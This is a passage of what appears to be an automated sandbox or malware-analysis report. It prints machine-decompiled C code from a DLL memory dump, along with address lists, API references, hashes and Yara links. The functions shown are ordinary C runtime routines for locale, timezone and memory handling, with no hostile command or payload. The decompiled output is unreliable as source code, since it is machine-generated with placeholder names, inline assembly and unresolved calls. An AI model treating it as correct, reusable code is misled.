											_push(_t148 ^ _t247);
											 *[fs:0x0] =  &_v60;
											_v68 = _t186;
											_t226 =  *((intOrPtr*)(_t186 + 4));
											_t151 = 0;
											__eflags = 0;
											_t234 = _v40;
											_v64 = 0;
											do {
												_t190 =  *((intOrPtr*)(_t186 + 0xc));
												__eflags = _t234 - 0xffff;
												if(_t234 == 0xffff) {
													__eflags = _t151 - 0x5f;
													if(_t151 == 0x5f) {
														L50:
														_t191 = 1;
													} else {
														_t216 = _t151 & 0x000000ff;
														_t197 =  *( *((intOrPtr*)(_t190 + 4)) + 0xc);
														__eflags =  *(_t197 + _t216 * 2) & 0x00000107;
														_t151 = _v24;
														if(( *(_t197 + _t216 * 2) & 0x00000107) != 0) {
															goto L50;
														} else {
															_t191 = 0;
														}
													}
												} else {
													_t199 =  *( *((intOrPtr*)(_t190 + 4)) + 0xc);
													__eflags =  *(_t199 + (_t151 & 0x000000ff) * 2) & _t234;
													_t191 = _t199 & 0xffffff00 | ( *(_t199 + (_t151 & 0x000000ff) * 2) & _t234) != 0x00000000;
												}
												__eflags = _t191 - _a4;
												if(_t191 != _a4) {
													_t214 =  *(_t226 + 0x18);
													__eflags = _t214;
													if(__eflags == 0) {
														_push(0x20);
														_t152 = E6D4906EF(_t191, _t214, _t234, __eflags);
														_t248 = _t248 + 4;
														_v32 = _t152;
														_v12 = 0;
														asm("xorps xmm0, xmm0");
														asm("movups [eax], xmm0");
														asm("movups [eax+0x10], xmm0");
														_v12 = 0xffffffff;
														_t214 = _t152;
														 *(_t226 + 0x18) = _t152;
														_t151 = _v24;
													}
													_t238 = (_t151 >> 3) + _t214;
													__eflags = _t238;
													asm("bts edx, ecx");
													 *_t238 =  *_t238 & 0x000000ff;
													_t234 = _v0;
												}
												_t186 = _v28;
												_t151 = _t151 + 1;
												_v24 = _t151;
												__eflags = _t151 - 0x100;
											} while (_t151 < 0x100);
											 *[fs:0x0] = _v20;
											return _t151;
										} else {
											 *(_t233 + 8) = _t168;
											 *_t233 = _v28;
											goto L26;
										}
									}
									goto L57;
									L26:
									_t161 =  *(_t233 + 4);
									_t210 = _a7;
									 *((char*)( *(_t233 + 8) + _t161)) = _a7;
									 *(_t233 + 4) =  *(_t233 + 4) + 1;
									_t186 = _v20 + 1;
									_v20 = _t186;
									__eflags = _t186 - _a8;
								} while (_t186 <= _a8);
								 *[fs:0x0] = _v16;
								return _t161;
							}
						}
					}
				}
				L57:
			}

0x6d471d93
0x6d471d95
0x6d471da0
0x6d471da1
0x6d471da6
0x6d471dad
0x6d471dae
0x6d471db1
0x6d471db7
0x6d471dc0
0x6d471e26
0x6d471e2a
0x6d471e2e
0x6d471dc2
0x6d471dc5
0x6d471dc8
0x6d471dca
0x6d471dd2
0x6d47204d
0x6d471dd8
0x6d471dd8
0x6d471de1
0x6d471de6
0x6d471de6
0x6d471dec
0x6d471df2
0x6d471df5
0x6d471df7
0x6d471dff
0x6d472057
0x6d471e1e
0x6d471e21
0x6d471e05
0x6d471e05
0x6d471e0e
0x6d471e13
0x6d471e16
0x6d471e19
0x6d471e19
0x6d471dff
0x6d471e31
0x6d471e34
0x6d471e37
0x6d471e3c
0x6d472037
0x6d47203a
0x6d472047
0x6d471e42
0x6d471e42
0x6d471e47
0x6d471e4a
0x6d471e4c
0x6d471e4e
0x6d471e50
0x6d471e55
0x6d471e58
0x6d471e5b
0x6d471e62
0x6d471e65
0x6d471e68
0x6d471e6c
0x6d471e73
0x6d471e75
0x6d471e78
0x6d471e78
0x6d471e85
0x6d471e8b
0x6d471e8e
0x6d471e93
0x6d471e96
0x6d471e97
0x6d471e9c
0x00000000
0x6d471e9e
0x6d471ea1
0x6d471eae
0x6d471eae
0x00000000
0x6d471e9c
0x6d471eb1
0x6d471eb3
0x00000000
0x6d471eb9
0x6d471ebb
0x6d471ebd
0x6d471ec0
0x6d471f9b
0x6d471f9e
0x6d471fa0
0x6d471fcf
0x6d471fa2
0x6d471fa2
0x6d471fa4
0x6d471fa9
0x6d471fac
0x6d471faf
0x6d471fb6
0x6d471fb8
0x6d471fbb
0x6d471fbe
0x6d471fc5
0x6d471fc7
0x6d471fca
0x6d471fca
0x6d471fd2
0x6d471fd5
0x6d471fd7
0x6d471ff7
0x6d471ffa
0x6d472000
0x6d472003
0x6d472006
0x6d472009
0x6d47200c
0x6d47200e
0x6d472028
0x6d472028
0x6d472031
0x6d472034
0x6d472034
0x6d472034
0x00000000
0x6d472010
0x6d472010
0x6d472013
0x6d472014
0x6d472017
0x6d47201c
0x6d47201f
0x6d472021
0x00000000
0x6d472023
0x6d472023
0x6d472026
0x00000000
0x6d472026
0x6d472021
0x6d471fd9
0x6d471fd9
0x6d471fdc
0x6d471fdd
0x6d471fe0
0x6d471fe3
0x6d471fe8
0x6d471feb
0x6d471fed
0x00000000
0x6d471fef
0x6d471fef
0x6d471ff5
0x00000000
0x6d471ff5
0x6d471fed
0x6d471ec6
0x6d471ec6
0x6d471ec8
0x00000000
0x6d471ed0
0x6d471ed0
0x6d471ed0
0x6d471ed7
0x6d471eda
0x6d471edd
0x6d471ee2
0x6d471ee5
0x6d471ee7
0x6d471eea
0x6d471eef
0x6d472061
0x6d472063
0x6d471ef5
0x6d471ef5
0x6d471efd
0x6d471f02
0x6d471f02
0x6d471f05
0x6d471f05
0x6d471f08
0x6d471f0b
0x6d471f0e
0x6d471f11
0x6d471f13
0x6d471f15
0x6d471f17
0x6d471f1c
0x6d471f1f
0x6d471f22
0x6d471f29
0x6d471f2b
0x6d471f2e
0x6d471f31
0x6d471f3b
0x6d471f3e
0x6d471f3e
0x6d471f40
0x6d471f43
0x6d471f45
0x00000000
0x6d471f47
0x6d471f47
0x6d471f4a
0x6d471f4b
0x6d471f4e
0x6d471f51
0x6d471f56
0x6d471f59
0x6d471f5b
0x6d47206a
0x6d47206a
0x6d47206f
0x6d47206f
0x6d472074
0x6d472075
0x6d472076
0x6d472077
0x6d472078
0x6d472079
0x6d47207a
0x6d47207b
0x6d47207c
0x6d47207d
0x6d47207e
0x6d47207f
0x6d472083
0x6d472085
0x6d472090
0x6d472091
0x6d472094
0x6d472095
0x6d472096
0x6d47209d
0x6d4720a1
0x6d4720a7
0x6d4720aa
0x6d4720ad
0x6d4720ad
0x6d4720af
0x6d4720b3
0x6d4720b6
0x6d4720b6
0x6d4720b9
0x6d4720bd
0x6d4720d1
0x6d4720d3
0x6d4720f0
0x6d4720f0
0x6d4720d5
0x6d4720d8
0x6d4720e0
0x6d4720e3
0x6d4720e7
0x6d4720ea
0x00000000
0x6d4720ec
0x6d4720ec
0x6d4720ec
0x6d4720ea
0x6d4720bf
0x6d4720c5
0x6d4720c8
0x6d4720cc
0x6d4720cc
0x6d4720f2
0x6d4720f5
0x6d4720f7
0x6d4720fa
0x6d4720fc
0x6d4720fe
0x6d472100
0x6d472105
0x6d472108
0x6d47210b
0x6d472112
0x6d472115
0x6d472118
0x6d47211c
0x6d472123
0x6d472125
0x6d472128
0x6d472128
0x6d472135
0x6d472135
0x6d47213a
0x6d47213d
0x6d47213f
0x6d47213f
0x6d472143
0x6d472146
0x6d472147
0x6d47214a
0x6d47214a
0x6d472158
0x6d472165
0x6d471f61
0x6d471f61
0x6d471f67
0x00000000
0x6d471f67
0x6d471f5b
0x00000000
0x6d471f69
0x6d471f6c
0x6d471f6f
0x6d471f72
0x6d471f78
0x6d471f7b
0x6d471f7c
0x6d471f7f
0x6d471f7f
0x6d471f8b
0x6d471f98
0x6d471f98
0x6d471ec8
0x6d471ec0
0x6d471eb3
0x00000000

APIs

__Tolower.LIBCPMT ref: 6D471DE1
__Tolower.LIBCPMT ref: 6D471E0E
__Tolower.LIBCPMT ref: 6D471EFD

Part of subcall function 6D47A4F6: ___crtLCMapStringA.LIBCPMT ref: 6D47A5CD

Concurrency::cancel_current_task.LIBCPMT ref: 6D47206A
Concurrency::cancel_current_task.LIBCPMT ref: 6D47206F

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Tolower$Concurrency::cancel_current_task$String___crt
String ID:
API String ID: 3933662966-0
Opcode ID: 6741194ad1634bc59caec1ae9f38c558d5739785c48ea6facd471358ad80de13
Instruction ID: a750ac14e8c91bb0b1e22e3ce6ea7e9e710779738135633f065da6cdc3286ced
Opcode Fuzzy Hash: 6741194ad1634bc59caec1ae9f38c558d5739785c48ea6facd471358ad80de13
Instruction Fuzzy Hash: 62A19B759046469FCB24CF28C890AAABBF1FF59310F24C55EE8A99B741D731ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8A45, Relevance: 7.7, APIs: 5, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6D4C8A45(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;
				void* _t124;

				_t88 = __edi;
				_t96 = E6D4C831F();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6D4C837D( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6D4B40F5();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6d534074; // 0x286e79ba
					_v56 = _t38 ^ _t106;
					 *0x6d534494 =  *0x6d534494 | 0xffffffff;
					 *0x6d534488 =  *0x6d534488 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t89 = 0;
					 *0x6d540a58 = 0;
					_t42 = E6D4D2636(0x6d508120, 0, _t96, __eflags, _t124,  &_v316,  &_v312, 0x100, 0x6d508120);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6D4C1817(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6D4D2636(0x6d508120, 0, _t101, __eflags, _t124,  &_v276, _t101, _v272, 0x6d508120);
								__eflags = _t50;
								if(_t50 == 0) {
									E6D4C02CE(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6D4C02CE();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(__eflags == 0) {
						L34:
						E6D4C8A45(0x6d508120, _t89, _t100, __eflags);
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t89);
							E6D4C8870(0x6d508120, _t89, _t100, __eflags, _t124);
						}
					}
					E6D4C02CE(_t100);
					__eflags = _v12 ^ _t106;
					return E6D4903E3(_v12 ^ _t106);
				} else {
					_t54 = E6D4C8325( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6D4C8351( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6D4C02CE( *0x6d540a50);
							 *0x6d540a50 = 0;
							 *_t107 = 0x6d540a60;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6d540a60 * 0x3c;
								_t87 =  *0x6d540ab4; // 0x0
								_push(__edi);
								 *0x6d540a58 = 1;
								_v8 = _t85;
								_t116 =  *0x6d540aa6; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								_t118 =  *0x6d540afa; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6d540b08; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E6D4B4298(0, _t87, _t124);
								if(WideCharToMultiByte(_t93, 0, 0x6d540a64, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, 0x6d540ab8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6D4C8319()) = _v8;
							 *(E6D4C830D()) = _v12;
							_t61 = E6D4C8313();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x6d4c8a45
0x6d4c8a54
0x6d4c8a5b
0x6d4c8a5f
0x6d4c8a62
0x6d4c8a65
0x6d4c8a6a
0x6d4c8a6d
0x6d4c8b95
0x6d4c8b95
0x6d4c8b96
0x6d4c8b97
0x6d4c8b98
0x6d4c8b99
0x6d4c8b9a
0x6d4c8b9f
0x6d4c8ba3
0x6d4c8bab
0x6d4c8bb2
0x6d4c8bb5
0x6d4c8bc2
0x6d4c8bc9
0x6d4c8bca
0x6d4c8bd1
0x6d4c8be0
0x6d4c8be7
0x6d4c8bef
0x6d4c8bf1
0x6d4c8bfb
0x6d4c8bfe
0x6d4c8c0b
0x6d4c8c0e
0x6d4c8c10
0x6d4c8c29
0x6d4c8c31
0x6d4c8c33
0x6d4c8c39
0x6d4c8c3e
0x6d4c8c35
0x6d4c8c35
0x00000000
0x6d4c8c35
0x6d4c8c12
0x6d4c8c12
0x6d4c8c13
0x6d4c8c13
0x6d4c8c13
0x6d4c8c40
0x6d4c8bf3
0x6d4c8bf3
0x6d4c8bf3
0x6d4c8c4d
0x6d4c8c4f
0x6d4c8c51
0x6d4c8c53
0x6d4c8c63
0x6d4c8c63
0x6d4c8c55
0x6d4c8c55
0x6d4c8c58
0x00000000
0x6d4c8c5a
0x6d4c8c5a
0x6d4c8c5b
0x6d4c8c60
0x6d4c8c58
0x6d4c8c69
0x6d4c8c74
0x6d4c8c7f
0x6d4c8a73
0x6d4c8a77
0x6d4c8a7c
0x6d4c8a7f
0x00000000
0x6d4c8a85
0x6d4c8a89
0x6d4c8a8e
0x6d4c8a91
0x00000000
0x6d4c8a97
0x6d4c8a9d
0x6d4c8aa2
0x6d4c8aa8
0x6d4c8ab8
0x6d4c8abe
0x6d4c8ac5
0x6d4c8acb
0x6d4c8acf
0x6d4c8ad5
0x6d4c8ad8
0x6d4c8adf
0x6d4c8ae6
0x6d4c8ae6
0x6d4c8ae9
0x6d4c8af0
0x6d4c8b08
0x6d4c8b08
0x6d4c8b0b
0x6d4c8af2
0x6d4c8af2
0x6d4c8af9
0x00000000
0x6d4c8afb
0x6d4c8afd
0x6d4c8b03
0x6d4c8b03
0x6d4c8af9
0x6d4c8b13
0x6d4c8b2f
0x6d4c8b3f
0x6d4c8b36
0x6d4c8b38
0x6d4c8b38
0x6d4c8b5d
0x6d4c8b6f
0x6d4c8b64
0x6d4c8b67
0x6d4c8b67
0x6d4c8b5d
0x6d4c8b79
0x6d4c8b83
0x6d4c8b88
0x6d4c8b8d
0x6d4c8b94
0x6d4c8b94
0x6d4c8a91
0x6d4c8a7f

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8A9D

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(6D4D78BF,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF,6D4D78BF), ref: 6D4C02F6

_free.LIBCMT ref: 6D4C8C69

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: c114ee3486ffc409e25c6cab92bdfb41655b7dd88954172b20faa217a1f85030
Instruction ID: 2b89349fec85de3f5a443b8285afcf0bb47ee99fe55d698883624f822fbcaf51
Opcode Fuzzy Hash: c114ee3486ffc409e25c6cab92bdfb41655b7dd88954172b20faa217a1f85030
Instruction Fuzzy Hash: 4151EBB9904209AFDF10DF6ACC84D7E77B8EF45314B22426FE56497690E7309E41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BBE39, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D4BBE39(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x6d534074; // 0x286e79ba
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E6D4B3E8A( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E6D490434(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x6d4d75d1
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E6D490434(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E6D490434(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E6D4CABF1(_t56);
						_t40 = E6D4C02CE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E6D4CABF1(_t56);
						E6D4C02CE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x6d534074;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t19 = _t71 + 4; // 0x68ffffff
								_t71 = _t19;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x6d4bbe39
0x6d4bbe43
0x6d4bbe47
0x6d4bbe49
0x6d4bbe4d
0x6d4bbe57
0x6d4bbe68
0x6d4bbe6d
0x6d4bbe6f
0x6d4bbe71
0x6d4bbe73
0x6d4bbe75
0x6d4bbe79
0x6d4bbf33
0x6d4bbf41
0x6d4bbf43
0x6d4bbf48
0x6d4bbf4f
0x6d4bbf51
0x6d4bbf5f
0x6d4bbf6e
0x6d4bbf71
0x6d4bbf73
0x00000000
0x6d4bbf74
0x6d4bbe81
0x6d4bbe86
0x6d4bbe8b
0x6d4bbe8d
0x6d4bbe8d
0x6d4bbe8f
0x6d4bbe94
0x6d4bbe98
0x6d4bbe98
0x6d4bbe9b
0x6d4bbeba
0x6d4bbeba
0x6d4bbebc
0x6d4bbebf
0x6d4bbec8
0x6d4bbecb
0x6d4bbed0
0x6d4bbed3
0x6d4bbed8
0x00000000
0x00000000
0x6d4bbeda
0x00000000
0x6d4bbe9d
0x6d4bbe9d
0x6d4bbe9f
0x6d4bbea8
0x6d4bbeab
0x6d4bbeb0
0x6d4bbeb3
0x6d4bbeb8
0x6d4bbee2
0x6d4bbee5
0x6d4bbee7
0x6d4bbeea
0x6d4bbef2
0x6d4bbef8
0x6d4bbeff
0x6d4bbf01
0x6d4bbf09
0x6d4bbf18
0x6d4bbf1c
0x6d4bbf1e
0x6d4bbf21
0x00000000
0x00000000
0x6d4bbf23
0x6d4bbf26
0x6d4bbf28
0x6d4bbf28
0x6d4bbf29
0x6d4bbf2b
0x6d4bbf2b
0x6d4bbf2e
0x00000000
0x6d4bbf28
0x00000000
0x6d4bbeb8
0x6d4bbe9b
0x00000000

APIs

_free.LIBCMT ref: 6D4BBEAB
_free.LIBCMT ref: 6D4BBECB

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3420a533071c39359d1666f58fb0fd03dd39663e2802c2fbc68213839278820b
Instruction ID: 4ffa1ed2bcd699370cdec3dc2b3c2a93f6a1acef54e5317ec57aec5db1565ef9
Opcode Fuzzy Hash: 3420a533071c39359d1666f58fb0fd03dd39663e2802c2fbc68213839278820b
Instruction Fuzzy Hash: B241A176A002009BDB14CF79C880E5AB7B5EF89714F2645A9E615EB351DB31AD01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D45CB80, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D45CB80(void* __edx, void* __fp0, void* _a4) {
				char _v8;
				char _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t53;
				void* _t54;
				intOrPtr* _t61;
				void* _t63;
				signed int _t68;
				signed int _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t86;
				signed int _t88;
				intOrPtr* _t92;
				signed int _t94;
				void* _t108;

				_t108 = __fp0;
				_t86 = __edx;
				_push(0xffffffff);
				_push(0x6d4fc0e0);
				_push( *[fs:0x0]);
				_t45 =  *0x6d534074; // 0x286e79ba
				_push(_t45 ^ _t94);
				 *[fs:0x0] =  &_v16;
				_v20 = 0;
				E6D476A10( &_v28, 0);
				_v8 = 0;
				_t88 =  *0x6d55a9f8;
				_t71 =  *0x6d55a9dc;
				if(_t88 == 0) {
					E6D476A10( &_v24, _t88);
					_v8 = 1;
					if( *0x6d55a9f8 == _t88) {
						_t68 =  *0x6d53fb40; // 0x2
						_t69 = _t68 + 1;
						 *0x6d53fb40 = _t69;
						 *0x6d55a9f8 = _t69;
					}
					_v8 = 0;
					E6D476A77( &_v24);
					_t88 =  *0x6d55a9f8;
				}
				_t75 =  *((intOrPtr*)(_a4 + 4));
				if(_t88 >=  *((intOrPtr*)(_t75 + 0xc))) {
					_t92 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t75 + 0x14)) == 0) {
						L11:
						if(_t92 != 0) {
							L21:
							_v8 = 0xffffffff;
							E6D476A77( &_v28);
							 *[fs:0x0] = _v16;
							return _t92;
						}
						L12:
						if(_t71 == 0) {
							_push(0x18);
							_t92 = E6D4906EF(_t75, _t86, _t92, __eflags);
							_v24 = _t92;
							_v8 = 2;
							_t79 =  *((intOrPtr*)(_a4 + 4));
							__eflags = _t79;
							if(_t79 != 0) {
								_t53 =  *((intOrPtr*)(_t79 + 0x18));
								__eflags = _t53;
								if(_t53 == 0) {
									_t53 = _t79 + 0x1c;
								}
							} else {
								_t53 = 0x6d50f4bd;
							}
							_t54 = L6D4519A0(_t71,  &_v80, _t86, _t88, _t108, _t53);
							_v8 = 3;
							_v20 = 1;
							 *_t92 = 0x6d500310;
							_v8 = 4;
							_t30 = _t92 + 4; // 0x4
							 *_t92 = 0x6d500320;
							 *_t30 = 0;
							_v8 = 5;
							 *_t92 = 0x6d503f60;
							E6D460200(_t92, _t86, _t30, _t92, _t108, _t54, 1);
							_v8 = 0;
							_v20 = 1;
							_v20 = 0;
							E6D451A70();
							_a4 = _t92;
							_v8 = 7;
							E6D478A0B(__eflags, _t92);
							_t61 =  *((intOrPtr*)( *_t92 + 4));
							__eflags = _t61 - 0x6d451d80;
							if(_t61 != 0x6d451d80) {
								 *_t61();
							} else {
								asm("lock inc dword [edi]");
							}
							 *0x6d55a9dc = _t92;
							_a4 = 0;
							_v8 = 0;
						} else {
							_t92 = _t71;
						}
						goto L21;
					}
					_t63 = E6D478A37();
					if(_t88 >=  *((intOrPtr*)(_t63 + 0xc))) {
						goto L12;
					}
					_t92 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) + _t88 * 4));
					goto L11;
				}
				_t92 =  *((intOrPtr*)( *((intOrPtr*)(_t75 + 8)) + _t88 * 4));
				if(_t92 != 0) {
					goto L21;
				}
				goto L8;
			}

0x6d45cb80
0x6d45cb80
0x6d45cb83
0x6d45cb85
0x6d45cb90
0x6d45cb97
0x6d45cb9e
0x6d45cba2
0x6d45cbad
0x6d45cbb4
0x6d45cbb9
0x6d45cbc0
0x6d45cbc6
0x6d45cbce
0x6d45cbd4
0x6d45cbd9
0x6d45cbe3
0x6d45cbe5
0x6d45cbea
0x6d45cbeb
0x6d45cbf0
0x6d45cbf0
0x6d45cbf5
0x6d45cbfc
0x6d45cc01
0x6d45cc01
0x6d45cc0a
0x6d45cc10
0x6d45cc22
0x6d45cc22
0x6d45cc24
0x6d45cc28
0x6d45cc3a
0x6d45cc3c
0x6d45cd0f
0x6d45cd0f
0x6d45cd19
0x6d45cd23
0x6d45cd31
0x6d45cd31
0x6d45cc42
0x6d45cc44
0x6d45cc4d
0x6d45cc54
0x6d45cc59
0x6d45cc5c
0x6d45cc63
0x6d45cc66
0x6d45cc68
0x6d45cc71
0x6d45cc74
0x6d45cc76
0x6d45cc78
0x6d45cc78
0x6d45cc6a
0x6d45cc6a
0x6d45cc6a
0x6d45cc7f
0x6d45cc84
0x6d45cc88
0x6d45cc8f
0x6d45cc95
0x6d45cc9c
0x6d45cc9f
0x6d45cca5
0x6d45ccab
0x6d45ccb7
0x6d45ccbd
0x6d45ccc2
0x6d45ccce
0x6d45ccd7
0x6d45ccda
0x6d45ccdf
0x6d45cce2
0x6d45cce7
0x6d45ccf1
0x6d45ccf4
0x6d45ccf9
0x6d45cd34
0x6d45ccfb
0x6d45ccfb
0x6d45ccfb
0x6d45ccfe
0x6d45cd04
0x6d45cd0b
0x6d45cc46
0x6d45cc46
0x6d45cc46
0x00000000
0x6d45cc44
0x6d45cc2a
0x6d45cc32
0x00000000
0x00000000
0x6d45cc37
0x00000000
0x6d45cc37
0x6d45cc15
0x6d45cc1a
0x00000000
0x00000000
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D45CBB4
std::_Lockit::_Lockit.LIBCPMT ref: 6D45CBD4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45CBFC
std::_Facet_Register.LIBCPMT ref: 6D45CCE7
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45CD19

Memory Dump Source

